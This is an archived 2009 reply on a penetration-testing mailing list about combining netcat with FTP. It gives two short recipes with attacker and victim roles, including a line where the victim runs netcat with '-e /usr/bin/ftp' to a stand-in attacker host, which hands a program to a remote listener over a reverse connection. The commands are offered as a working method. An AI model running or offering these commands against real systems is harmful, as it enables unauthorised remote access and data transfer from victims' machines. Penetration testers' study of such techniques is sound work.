Penetration Testing mailing list archives

Re: Netcat reverse shell and ftp

From: anastasiosm () gmail com
Date: 25 Jan 2009 15:14:55 -0000

Avaya,

ATTACKER: FTP server is running on his box and listens on port 23
VICTIM: nc -vv ftp.attacker_box.com listening_port_23
220 FTP server ready
USER attacker_username_on_ftp
331 Password required for attacker_username_on_ftp
PASS attacker_password_on_ftp
230 ftp.attacker_box.com welcome message
230 user attacker_username_on_ftp logged in
now type help on the prompt to see the available commands

or

ATTACKER: nc -vv -l -p listening_port_xyz
VICTIM: nc -vv ftp.attacker.com listening_port_xyz -e /usr/bin/ftp
now to connect type on the prompt open localhost
enter your credentials (username/password) as shown above and you should be in

don't thing I have missed anything but let us know anyway